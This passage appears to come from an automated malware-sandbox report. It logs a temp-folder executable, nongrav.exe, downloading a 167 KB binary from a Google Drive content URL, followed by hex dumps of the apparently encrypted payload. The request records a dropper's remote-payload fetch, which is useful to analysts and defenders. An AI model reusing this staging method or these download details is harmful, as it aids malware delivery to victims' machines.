NID=511=XU9cPhkPEzophwyh3MGRmWojEC8XYsCGUUVP6Xpqww4mZOveOqwpw9LswvCggWgLghsUnufCd-udYmc2G9SprDfT_qeCcigMPM-e7iTdF6KKL0f7o5y54m9VMjYjAJPiqx243dRWK3_A5drOGaroDMJUdFdTi2GeepTp1DPkEWc; expires=Thu, 16-Jun-2022 13:13:48 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Accept-Ranges: none Vary: Sec-Fetch-Dest, Sec-Fetch-Mode, Sec-Fetch-Site,Accept-Encoding Connection: close Transfer-Encoding: chunked
2021-12-15 13:13:48 UTC	1	IN	Data Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 63 2d 61 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 75 62 66 33 Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-0c-ao-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3
2021-12-15 13:13:48 UTC	2	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.3	49838	172.217.168.1	443	C:\Users\user\AppData\Local\Temp\IXP000.TMP\nongrav.exe

Timestamp	kBytes transferred	Direction	Data
2021-12-15 13:13:48 UTC	2	OUT	GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/ubf3t0pvfkcl5sqbkpotb7a08dnj393g/1639574025000/11789396277519397655/*/1Pq36Fq9yGHzam_FHR1D0IrFRVEBW3FSZ?e=download HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Cache-Control: no-cache Host: doc-0c-ao-docs.googleusercontent.com Connection: Keep-Alive
2021-12-15 13:13:48 UTC	2	IN	HTTP/1.1 200 OK X-GUploader-UploadID: ADPycdv26AmqCAkUuCC8XjAmfSVQ6tFuZ4Bys0cnWeMxpGn3x0acHygtOgTHWktUsFvCah2tswGnAPz-B4P5DSK-JmxSQU0b9g Access-Control-Allow-Origin: * Access-Control-Allow-Credentials: false Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, x-chrome-connected, X-ClientDetails, X-Client-Version, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogApps-Allowed-Domains, X-Goog-AdX-Buyer-Impersonation, X-Goog-Api-Client, X-Goog-Visibilities, X-Goog-AuthUser, x-goog-ext-124712974-jspb, x-goog-ext-251363160-jspb, x-goog-ext-259736195-jspb, X-Goog-PageId, X-Goog-Encode-Response-If-Executable, X-Goog-Correlation-Id, X-Goog-Request-Info, X-Goog-Request-Reason, X-Goog-Experiments, x-goog-iam-authority-selector, x-goog-iam-authorization-token, X-Goog-Spatula, X-Goog-Travel-Bgr, X-Goog-Travel-Settings, X-Goog-Upload-Command, X-Goog-Upload-Content-Disposition, X-Goog-Upload-Content-Length, X-Goog-Upload-Content-Type, X-Goog-Upload-File-Name, X-Goog-Upload-Header-Content-Encoding, X-Goog-Upload-Header-Content-Length, X-Goog-Upload-Header-Content-Type, X-Goog-Upload-Header-Transfer-Encoding, X-Goog-Upload-Offset, X-Goog-Upload-Protocol, x-goog-user-project, X-Goog-Visitor-Id, X-Goog-FieldMask, X-Google-Project-Override, X-Goog-Api-Key, X-HTTP-Method-Override, X-JavaScript-User-Agent, X-Pan-Versionid, X-Proxied-User-IP, X-Origin, X-Referer, X-Requested-With, X-Stadia-Client-Context, X-Upload-Content-Length, X-Upload-Content-Type, X-Use-Alt-Service, X-Use-HTTP-Status-Code-Override, X-Ios-Bundle-Identifier, X-Android-Package, X-Ariane-Xsrf-Token, X-YouTube-VVT, X-YouTube-Page-CL, X-YouTube-Page-Timestamp, X-Compass-Routing-Destination, x-framework-xsrf-token, X-Goog-Meeting-ABR, X-Goog-Meeting-Botguardid, X-Goog-Meeting-ClientInfo, X-Goog-Meeting-ClientVersion, X-Goog-Meeting-Debugid, X-Goog-Meeting-Identifier, X-Goog-Meeting-RtcClient, X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout, x-foyer-client-environment Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/macbinary Content-Disposition: attachment;filename="XL bin_zuCGjTEmqF178.bin";filename*=UTF-8''XL%20bin_zuCGjTEmqF178.bin Content-Length: 167488 Date: Wed, 15 Dec 2021 13:13:48 GMT Expires: Wed, 15 Dec 2021 13:13:48 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=063w5A== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-15 13:13:48 UTC	6	IN	Data Raw: d6 c3 1b 41 ba 63 42 f4 79 05 64 19 72 7a 75 ba 64 6d 07 b3 f2 83 29 f1 87 b6 f9 c4 72 74 ee 54 d4 01 42 81 55 2d 74 d2 a0 75 17 6d e3 0d 4e fa 17 79 e4 87 39 85 9c 35 ae da 2c a9 25 12 31 eb 52 83 fd 2d 77 d9 54 b9 66 7e b5 cd 1f 6c 7e c3 de 0b 1b 2b 7a 26 dd f2 7b e5 33 46 d8 8a 13 2e 25 d0 91 a2 df 43 6c 4f bb 9f db a7 d8 60 da e6 94 a1 88 19 9d 12 75 bf dd 6e 4c 22 19 c4 76 02 fa 17 72 ec 65 ac 93 a4 e3 1b 1c 87 ba ab 39 c9 ec ff 83 e0 65 8f 0f 56 81 c8 a4 c5 3b 45 16 f5 4e bc 3f 50 7d b6 af 65 87 71 f8 07 3b d2 61 83 c2 6b 17 d4 00 1a 66 21 cf 5d 88 7c 2c db 3d c4 07 bd 45 3b 80 20 18 1c 7b 65 66 af d4 75 cb b6 8d 4d 0e 28 89 cf f3 7f e8 64 2d ad ed 16 93 07 16 6b 52 c9 ef 77 9d d0 a4 0a 53 97 c2 ae 49 5b e6 f2 34 5a 96 0f aa 49 8a b6 2f ed e4 36 dc Data Ascii: AcBydrzudm)rtTBU-tumNy95,%1R-wTf~l~+z&{3F.%ClO`unL"vre9eV;EN?P}eq;akf!]\|,=E; {efuM(d-kRwSI[4ZI/6
2021-12-15 13:13:48 UTC	9	IN	Data Raw: 63 5c e5 4a 67 5c 00 eb e8 bb 95 b7 19 f7 f4 3a f2 49 5b bf 2e be 57 30 e0 46 3d 63 24 ac 90 8d a6 61 5d de 00 87 e1 7d 2a 9e 0e 51 17 b3 45 21 0b 7e 7e d5 13 10 da 88 6e 06 2a a1 e6 43 19 c0 99 93 8f 65 74 be 19 1e 77 c9 da 7b 52 42 31 65 ed 4b 8b 34 85 04 6b 46 4b 3e d4 fa 28 cb 0f 5d 11 63 95 21 3b f5 9d 9f 5a 87 ef 5e ff 93 6e cf f3 bf 75 02 fb d4 a0 89 9a ae 6a cc 51 04 f1 c9 93 81 90 9b a0 22 75 f3 07 4d 2c e8 8b cb 81 d6 34 65 8d 8c 45 a1 9d 9d 54 de 7e 64 30 00 ae d4 3e 68 de e1 88 e5 30 5d cf 35 98 b2 18 99 cd d0 66 20 e1 28 82 59 1f d9 b8 7f 9f d9 54 b9 66 26 36 25 16 e7 b6 40 1e 37 90 2b 79 e7 5e 32 53 e6 3b b9 39 1a 13 2e 25 d0 91 a2 df 43 6c 4f bb 9f db a7 d8 60 da e6 94 a1 88 19 9d 12 75 bf dd 6e 4c 22 a1 c4 76 02 f4 08 c8 e2 65 18 9a 69 c2 Data Ascii: c\Jg\:I[.W0F=c$a]}QE!~~nCetw{RB1eK4kFK>(]c!;Z^nujQ"uM,4eET~d0>h0]5f (YTf&6%@7+y^2S;9.%ClO`unL"vei
2021-12-15 13:13:48 UTC	13	IN	Data Raw: b4 05 6a 6c bd 3f 97 22 48 ef f7 b2 a6 f9 d0 85 2f ce 79 b0 26 2f 1c bf 57 74 04 b4 11 8f bf 6b a7 96 c0 af fa 29 37 02 38 c7 8a 8d af e1 65 00 3e 2e 57 d4 dc 65 46 57 25 08 dd d9 15 9a be ff 15 b0 f3 23 a6 06 63 e1 8a 4b cc 25 77 a1 a3 33 3a e2 e4 98 25 ac 69 28 8e af b5 01 bf 82 0a ca c5 eb 88 bc c6 1e 25 cd 42 35 51 f4 fb aa f9 30 9a cb 5c be 97 2f 9c 5b 11 be 94 9b 85 37 15 44 6a 92 f3 1d 3b fd 77 a9 a6 40 d1 11 32 55 2a 81 b8 87 d9 53 6f 03 dc 1b a9 19 85 6f 1c 82 d5 77 a0 ff 50 74 c0 cd f6 81 81 cd 1b 18 ca 4f eb f6 d7 5e 19 96 a3 7a f6 54 0a 91 89 41 e6 96 0f b1 2a bc d7 ba cc 9a 12 24 ae 11 cf c3 ee ba b6 c1 2b 88 06 e5 53 9a 94 63 6b de c4 d1 81 83 62 40 6a 5a 01 6c 91 3e 55 19 22 c5 7e dc 5e 76 65 69 de 78 22 c3 74 c5 6d 7e 6f ca 66 e4 e2 34 82 Data Ascii: jl?"H/y&/Wtk)78e>.WeFW%#cK%w3:%i(%B5Q0\/[7Dj;w@2USoowPtO^zTA$+Sckb@jZl>U"~^veix"tm~of4
2021-12-15 13:13:48 UTC	17	IN	Data Raw: 5a 7e 63 78 c2 ef a0 f1 49 1c 7a 1c 56 ba 76 35 a3 7a 7a 94 ef a1 50 3a ca 84 5f 7b a2 c9 0a 3f 5c 3c c9 de 03 d1 d8 c3 bd 21 9b 0d 38 34 3a 7d 59 ad a1 2f f0 1c 2d ca 97 08 54 14 d6 f7 bb 26 a9 c0 7f 52 77 f1 db 4c d8 43 a3 16 17 28 c6 8e b4 26 d0 d0 1c 40 a2 17 52 26 4c f1 a8 00 31 0d e2 6e 7c 2d b7 c0 98 8d 1b d9 bf 6c 69 90 49 f9 ed 22 3a a0 ea 8b 76 26 fc 53 d9 fa 7e be 70 21 72 9e 75 32 28 f2 57 c1 78 7d 3e c9 cb 7c da 07 7c bf 10 33 88 b3 0c 11 c5 71 c0 53 30 a5 f0 0f ff 7c a3 d8 62 01 3e 66 5c 30 83 5c 3d 68 27 1f dd 27 99 17 34 c8 13 b0 1a 59 af 17 b0 6b 65 07 ac b0 49 36 5c e5 74 ac f5 da 50 9a 6b 28 21 c2 52 ac a7 cc b1 f2 41 67 76 08 c2 72 f9 0a c7 6c 39 fb f2 af 50 34 bb 8a dd 62 6a d0 33 b4 84 39 66 5c 68 eb e9 bb 95 3a 94 f7 0b c5 0d 18 d6 Data Ascii: Z~cxIzVv5zzP:_{?\<!84:}Y/-T&RwLC(&@R&L1n\|-liI":v&S~p!ru2(Wx}>\|\|3qS0\|b>f\0\=h''4YkeI6\tPk(!RAgvrl9P4bj39f\h:
2021-12-15 13:13:48 UTC	18	IN	Data Raw: 87 cc 5e e6 43 19 4b ed 23 8b a4 ba ae d8 d5 7f fa 29 f0 8d c3 d2 9a ed 4b 8b bf d9 9c 6f 87 88 36 e7 09 a3 96 f3 9c ea 7b 14 c2 c4 f5 9d 9f 69 f3 77 5a cc e2 7a 44 ae 47 b4 f9 eb 15 5f 81 1b 4d 95 cc 51 04 7a 95 0b 85 11 7c 5f 22 75 f3 8c 31 94 ec 4a 00 89 17 fb 75 be 53 ce dc 61 1c b3 21 7e 64 30 8b d2 6c 3a a9 19 e9 bb 3a bb 20 23 f4 67 aa 99 7e 32 d0 66 20 d2 74 3a 5d 94 a4 44 4c c6 c1 95 46 6e af 6b d1 9d ba 46 81 e5 27 11 cc 86 e7 5e 32 d8 9a 83 bd b8 f9 ec 2e 25 d0 1a fe 47 47 ad 80 ab 5e 10 af eb 9b 51 bb 78 20 6b e6 9d 12 75 34 81 f6 48 e3 62 cc 45 f9 7f 55 30 23 9e 00 1b 8a 3d a3 1d cb 44 f6 f5 a5 06 4d 83 a3 6e 1c e1 59 18 2e f9 ae 8b d4 37 13 47 94 52 b1 25 c6 da 0b 4c 1e 1b bc 7f 9d 32 a3 24 79 87 70 d1 1f ea cc 14 5d 88 7c a7 a7 85 c0 bb 14 Data Ascii: ^CK#)Ko6{iwZzDG_MQz\|_"u1JuSa!~d0l:: #g~2f t:]DLFnkF'^2.%GG^Qx ku4HbEU0#=DMnY.7GR%L2$yp]\|
2021-12-15 13:13:48 UTC	19	IN	Data Raw: f7 7a 28 ba 40 0a b7 4b 17 7d dd 59 24 42 70 0c 0d 03 fb 65 10 10 8e ad 54 7b f9 20 5e 2a c6 6f 66 c9 75 a4 56 b9 93 be 3c 48 66 4a 84 b4 f4 63 8a f8 6a 75 1b 11 f5 2b c3 86 c6 cd f4 68 5e e8 fb ed e8 f9 e6 d2 1f b7 3a 0a 15 9b fc ee e9 05 63 fd 7f 5d 02 ea 1f 10 93 1b ad 50 e1 b9 20 fe cd 37 1e 7b a8 db 40 b8 b5 10 21 59 7c 8a 09 50 38 c9 78 d2 90 72 0e e6 9e fc f6 3c b9 c1 ee f8 29 4b 9f 07 ad 27 a6 e5 8e a8 73 cc 64 7d 70 11 7d 1c 11 48 57 77 de 74 9c fa 34 f8 80 0e dc 59 08 b6 64 d3 21 90 12 75 dd 98 ed 29 6f 2b 1d ee b3 2f 9d c9 04 49 23 1a 13 04 6f 34 43 21 3b 55 9a cd 67 c6 e1 2f cf 00 d5 6f 12 3c 6a 5a 5a 2c 8c 17 5f ad 3f 91 14 74 e0 8e 38 a9 f1 45 83 f0 7d ba 3c ae 3a ee ca 4e b5 1f 32 28 ee 28 93 c1 00 f2 27 5f 55 45 8f b3 2d c2 99 64 50 17 30 Data Ascii: z(@K}Y$BpeT{ ^*ofuV<HfJcju+h^:c]P 7{@!Y\|P8xr<)K'sd}p}HWwt4Yd!u)o+/I#o4C!;Ug/o<jZZ,_?t8E}<:N2(('_UE-dP0
2021-12-15 13:13:48 UTC	21	IN	Data Raw: 77 db 7a a3 7d 23 16 0a fa 66 37 e7 ed 29 11 1b f2 14 77 99 cd bc ad b4 33 cc 96 ef 54 e8 f6 3b 31 72 67 b8 a2 6a 41 ce 08 50 f0 7a 29 dd 09 92 da ca 6c 16 d8 48 df 4a 53 b6 d3 ad 93 f5 af 48 5e d8 7e b2 04 57 3f ee 97 90 68 2a 91 00 f8 84 f3 1f a6 04 d9 89 d2 99 be 78 9b 9d 28 80 dc f7 ec b1 94 a4 be 0b 39 10 46 5e 75 3f 60 73 bf 5c b4 8b e4 f3 6a fb 0a 0d 7d 01 cb 4d 2c e2 53 4f 9d 1d 57 36 64 2d 4d 73 25 d6 4f ef 87 aa 2b bc 78 fa dc 44 21 de 56 a8 e2 a9 a5 65 5b 3d 5a ce 23 91 43 fb 44 9b ff 4b b2 7f de a3 58 33 f1 07 9a fa 29 f3 9c 76 be 82 73 0b bd b6 49 5f 77 f8 2e 0e de b8 f7 10 c5 33 20 1f 4e 87 6e b2 7d 57 0f fd 92 22 58 04 49 ec c9 73 e5 03 a3 40 1f b5 45 c8 f3 1e ea 1c 72 34 b7 f2 2a 76 0e 63 d4 76 30 e8 87 7a 55 ed be 76 c3 ba 2d 91 74 38 90 Data Ascii: wz}#f7)w3T;1rgjAPz)lHJSH^~W?hx(9F^u?`s\j}M,SOW6d-Ms%O+xD!Ve[=Z#CDKX3)vsI_w.3 Nn}W"XIs@Er4vcv0zUv-t8
2021-12-15 13:13:48 UTC	22	IN	Data Raw: e2 4c ba 4b 04 2e 96 6f 70 11 da 0b aa 02 a7 2d a3 33 ec 3f 66 c2 d9 8d fd e0 19 1e fa 9c 6e 29 ba e2 52 64 ed c8 4f 20 86 c4 3b cb 0e 8a 84 77 a5 bb fa a2 ee 32 7d ab 58 f4 9d 12 ce c2 bd ab 00 6c ed 0b f7 ed 9d 88 9b d5 a0 04 17 56 94 33 ae 8f 20 71 d3 81 90 9b f2 44 fc b6 99 c4 61 48 63 ab e2 d7 34 66 4d ea cc e4 01 f5 4d dc 7c 64 bd 85 de 21 c1 97 8e 6c c5 7d 61 0b 27 a1 eb b2 18 1a 09 f0 e3 e0 95 40 0f 0c f3 8b 33 2a 07 b1 54 b8 66 26 bb a0 66 1c 49 bf 4e 5d 91 a6 34 7b 0f 60 05 0e 36 fa 38 1a 90 ea 39 55 51 d7 9e c8 e9 37 40 60 24 2a 54 65 aa 1d 6b 5e d9 4a 75 f0 17 be dd e3 d8 1a 05 40 76 02 77 cc cc b0 8d ba fc 68 c2 28 98 b3 8c 75 92 2c 09 89 d3 6b e8 1f 39 a9 75 dd 79 59 a5 79 90 12 5c 9d 5d b6 99 d4 57 8e df e5 69 d8 2f ca da 7b 5a fb 8c 32 ea Data Ascii: LK.op-3?fn)RdO ;w2}XlV3 qDaHc4fMM\|d!l}a'@3Tf&fIN]4{`689UQ7@`$Tek^Ju@vwh(u,k9uyYy\]Wi/{Z2
2021-12-15 13:13:48 UTC	23	IN	Data Raw: be 0f cc 62 ae 06 6a 3f fa cd 3a 8d 70 12 24 a9 5b 28 dd 69 60 a3 d0 d5 b2 c3 ed 26 1b 21 f1 34 3a c5 69 46 65 3f 75 ea 09 8b 3a 0f d7 e5 58 37 b6 e1 67 5d 5e 34 c9 66 74 08 04 d4 ea da 07 39 dc 5d d4 98 60 78 86 c6 59 e8 96 ff e1 63 66 04 78 0a 39 56 bb 68 08 14 40 69 76 2d 21 a7 85 b4 c9 3f 2a 67 ce 7c a4 42 5f 65 16 ab 38 93 3c b7 88 e9 cb 6a 07 6e dd 68 72 d9 39 d9 c0 c8 44 35 72 aa fe 1a 06 58 10 a2 2c da 30 1f 8a 83 68 09 8c 36 f8 1c c2 f9 cd ff c1 f1 55 fb ef 7d 90 c4 88 a1 ca f3 60 17 bf b3 60 f7 ca ec 62 91 c2 58 53 72 4a ed 8a d3 d1 43 8f 53 87 6c 60 33 c5 b1 f8 ca bc 53 09 ba 67 68 63 15 77 5f 42 ae a0 0b c7 e2 6c 88 c0 40 92 9a 35 0c d9 11 55 80 ee c9 45 b1 98 a3 57 b9 00 69 cf b6 19 74 30 36 7f 1c bb 32 ab 1e ac cf 1f ff 29 67 24 ac c2 04 fb Data Ascii: bj?:p$[(i`&!4:iFe?u:X7g]^4ft9]`xYcfx9Vh@iv-!?*g\|B_e8<jnhr9D5rX,0h6U}``bXSrJCSl`3Sghcw_Bl@5UEWit062)g$
2021-12-15 13:13:48 UTC	24	IN	Data Raw: e2 78 ff 15 7d ea 5d 0b b8 24 84 63 7c 7b db 7a 20 e2 7a 8a 98 17 e9 db 66 01 1a 9b fe af 54 89 6c fc c7 26 e0 cb fe e2 66 aa 01 c2 40 b0 3c 9f 81 d7 23 9a cf c5 a3 58 01 fb a9 18 43 6b 7f ae a4 69 f0 fb 2f 53 76 b7 13 57 c8 35 72 8b 20 4a 4c 69 d4 f1 94 c4 da 60 7a f5 83 42 b9 be e3 fa 87 1d 85 4a 82 15 dd 7e a5 eb cc ec ff 11 47 84 ab 5b 7b 55 9c 8b 81 50 d0 64 2d e5 d7 51 d6 e0 f0 87 ea 7f 18 f4 54 c3 1b 11 b4 36 10 16 e3 a8 4a f0 77 fa f0 2d 5d aa d8 44 a4 9f 72 5c 5d c4 99 3b 76 f9 12 8b 90 fe 64 d8 93 5a 21 e6 76 15 44 b8 64 0f 76 3f f4 4c c4 59 56 d7 91 64 05 55 66 78 e6 b8 d8 f8 63 74 30 52 58 b1 08 28 10 26 15 e0 e4 f5 3a 76 22 1c e2 e6 4e 2d da 01 a1 60 82 f9 0e 2a 14 ce b1 d6 a9 f8 a1 fb 65 38 b7 e8 9a f2 f4 35 29 20 8c 10 92 82 36 35 8f 36 e8 Data Ascii: x}]$c\|{z zfTl&f@<#XCki/SvW5r JLi`zBJ~G[{UPd-QT6Jw-]Dr\];vdZ!vDdv?LYVdUfxct0RX(&:v"N-`*e85) 656
2021-12-15 13:13:48 UTC	26	IN	Data Raw: 0c 4a b1 5f de 00 d4 6a 20 26 c9 8b 8a 18 37 63 20 0b 7e f5 a8 03 95 25 87 ea 1d 2b a1 e6 29 66 4d 1c a2 72 9a 8b d4 19 4e b1 4c ea 86 ad bd 31 8d 35 1a 8a 34 b6 cd 03 b8 4b 3e d4 ab a5 5e 3d a3 ee 9c c7 47 b2 78 ad 61 a5 78 07 e3 ae 92 6e a5 8c 32 f0 b3 06 2b 5f e3 9a fe ac 49 e1 f9 0e 36 93 69 36 ca a1 22 46 3a 6d 7b 7d 65 de 0d d3 11 71 69 d1 8c 45 a1 5a d8 e8 f0 7e 01 30 c7 eb 14 46 68 bb e1 ee 6c 7d 99 27 4a c9 b3 18 aa 04 ba 50 71 6c 7d 04 0b d8 5c c4 80 60 26 7a b9 02 26 f1 60 96 8b b6 2c 1e 51 19 66 fd 0f 02 63 52 e6 b6 fd 02 e5 90 ea 19 50 a9 93 aa 2b aa 4f bb 26 da a7 d8 60 5a de ba d5 cf 58 d5 91 8c b1 af 9a 1a 48 a9 49 33 be a4 85 45 9e 9a e7 65 38 2a 1a 4e ca 77 09 a9 ad 0c c9 5f 15 d7 94 10 9c e1 a5 84 a6 d7 5f 67 65 b7 07 5d 35 5d c4 50 05 Data Ascii: J_j &7c ~%+)fMrNL154K>^=Gxaxn2+_I6i6"F:m{}eqiEZ~0Fhl}'JPql}\`&z&`,QfcRP+O&`ZXHI3Ee8*Nw__ge]5]P
2021-12-15 13:13:48 UTC	27	IN	Data Raw: 09 45 2f 0e 40 19 36 c1 1b ec c5 07 b3 bf 84 db 6b ae c6 c2 96 88 45 74 8d 70 f9 de a9 5b cd 70 df 4f 29 45 56 1c 8b ed 98 cb 42 09 34 b9 8a 9d 46 59 1f 86 49 2a ae 99 1c 0d b1 26 ef 4d 1e 13 95 07 5b 5f e3 99 61 ff 2f 95 da 9e 66 8c 86 96 96 ea 9d 56 88 2e 42 87 2c ad 60 05 4d 09 19 a6 61 69 3a d6 c6 a3 eb 85 e1 aa 11 f3 d3 b6 78 d5 36 a8 93 8a b5 0c b1 b8 ab b5 06 02 26 48 9b dc 9d bc 41 a5 ca 2d b2 42 aa 9e 45 4c 10 29 3f 06 23 12 cf 77 a3 7c b9 4f 5b 06 d6 43 dd 53 fb e4 4a a9 99 90 7a 01 ed 1f df 85 9a c3 e3 c7 a7 ca e4 d6 16 bf b3 1e 28 05 dc 59 61 76 64 6a 01 dc 85 71 a1 a3 b3 9c 07 33 5e a0 e3 50 c7 1b 4f 91 ed 1a 15 02 97 50 ef 88 f7 fb 9a 0b 45 c6 e1 c6 0b 89 05 7f 34 bb 89 b1 9d 95 2f 33 b4 01 05 66 5c 8d 66 80 40 6a 48 48 a1 1c 3d 02 b6 a4 e9 Data Ascii: E/@6kEtp[pO)EVB4FYI*&M[_a/fV.B,`Mai:x6&HA-BEL)?#w\|O[CSJz(Yavdjq3^POPE4/3f\f@jHH=
2021-12-15 13:13:48 UTC	28	IN	Data Raw: da 0b a8 9c 24 27 7f 9d 64 f4 c7 02 71 b1 2e 47 e6 a6 11 a0 77 83 7d bd b4 41 82 26 85 df 51 9d 0e 55 42 e9 42 eb 60 cc b6 74 af d7 a3 88 e7 82 a3 37 c9 3e b2 68 42 e9 3f b0 cb a6 cc 69 cc 37 cd 98 7b e6 c8 02 04 56 48 fb 19 bb 35 5a 2f 53 aa 49 da 7e 91 01 24 37 dd f0 bb a8 c6 82 e4 21 85 ed f4 3b 29 7b c6 d2 d4 5a f8 df f6 0a 88 7d 70 38 1a a4 2c 28 38 42 a8 0b e4 c3 a4 53 c0 0d ff e7 88 05 a8 91 b7 6b e5 d7 da 45 23 7d 93 ca fc dc fa 3e c3 96 f6 48 46 6a 71 4c a8 67 ca 21 78 37 ff 9b 46 38 44 29 84 dd e5 ee b1 01 c5 0a c2 50 94 13 bf a5 87 0e 8a 15 b8 15 22 5e 7b 46 10 43 9d 26 d9 6e df d5 4a b3 07 84 04 62 1b c5 61 35 e4 ea e0 75 9c 2d 3b ff 28 6a 22 4a 08 9b 90 6c 79 cc 12 6c a3 be fe e9 88 34 9e 7d 06 50 46 08 97 b0 d6 40 46 37 f6 e8 86 9b ed 1e 06 Data Ascii: $'dq.Gw}A&QUBB`t7>hB?i7{VH5Z/SI~$7!;){Z}p8,(8BSkE#}>HFjqLg!x7F8D)P"^{FC&nJba5u-;(j"Jlyl4}PF@F7
2021-12-15 13:13:48 UTC	29	IN	Data Raw: 3a bb 58 c4 43 65 6b aa b6 2e 2c 27 11 55 a1 61 5d 5b c0 f3 f3 fe 92 fa 2e 51 17 b3 31 28 5a 96 bf 23 ec ef 59 4c 6a 5b e9 eb 2e 18 29 36 9f 8c 26 1f 9c ce 16 4b fc 25 5b 97 f2 40 31 65 66 0e 87 bf cd 0c 38 75 90 68 bc 04 29 cb 0f d0 94 01 68 de c4 c6 4f cc 0a 0e b2 8e 76 de a2 08 b6 1b 6d 02 fb d4 29 d4 32 27 37 7c d8 59 5d 40 ce 35 19 c6 18 44 fc 66 67 b0 d3 17 63 8d c3 d7 34 ee f8 84 c8 ec 51 cc d9 8b da 36 58 01 aa d4 3e e5 9b ed d8 b3 d8 21 ef 34 98 31 dc b9 48 10 69 a8 19 28 82 59 94 5f 18 74 9f d9 03 d1 91 78 22 e9 45 b4 e6 cd 60 2b c7 ec 3c 33 02 32 36 e6 fc fc e1 62 13 5e 25 17 d4 7e b3 43 03 4f 7c da 3b d5 d8 05 da 21 d1 45 fa 19 b3 12 b2 fa 35 0b 4c 5a a1 03 33 ee 91 08 c8 e2 8d f0 44 69 c2 20 d9 df 4c 49 19 a6 0e c1 af c3 46 1f b8 4e a0 28 11 Data Ascii: :XCek.,'Ua][.Q1(Z#YLj[.)6&K%[@1ef8uh)hOvm)2'7\|Y]@5Dfgc4Q6X>!41Hi(Y_tx"E`+<326b^%~CO\|;!E5LZ3Di LIFN(
2021-12-15 13:13:48 UTC	31	IN	Data Raw: ca 7f 2e cf 34 e3 9c 41 7a e8 df 5f 9a ec eb 48 a3 c0 72 1d c1 1b d5 c4 98 ff be 09 34 c6 d6 ac 55 3d fa f7 be 8a 70 3c 44 a9 5b cd a0 2f e6 3e 73 e0 d8 c3 36 3d fb 80 4d ac 6a 26 90 c4 a1 0f a1 f4 1a ab 50 4d 03 c9 4f 36 53 bc 2f 4d d9 5b 8c 82 10 0b 04 d0 39 dc cb 34 eb 6d 15 c6 eb 10 5e fc b8 46 87 80 ac be 70 10 07 19 a6 ba 80 55 5a 43 a3 17 7b 1e fa 11 f3 4e b0 78 d5 34 9f 92 00 a9 ad 1e 46 43 1b ae 6b dd 5f 2a bc ca 54 6e 06 dd b5 03 87 82 4a 98 f9 2a 5f 45 0d b6 11 33 27 4b 0b 12 44 17 8a 5b 3c a6 f0 0f b5 a2 61 62 99 ff 91 14 af 4d fb 5d 3c 1e 9d 0b 70 d8 1d ef 41 c7 6f 24 e6 e8 1f 63 b6 bf 66 84 ca 29 b2 d3 d1 19 8a 53 87 0e ca 18 c7 3f 6e 96 1c a8 75 81 87 4a d0 62 ae 08 aa f1 39 02 42 21 d8 21 8f 25 a3 0c 22 cb 9f 7e 6b d0 63 5c 0d 9c 0f 5d 00 Data Ascii: 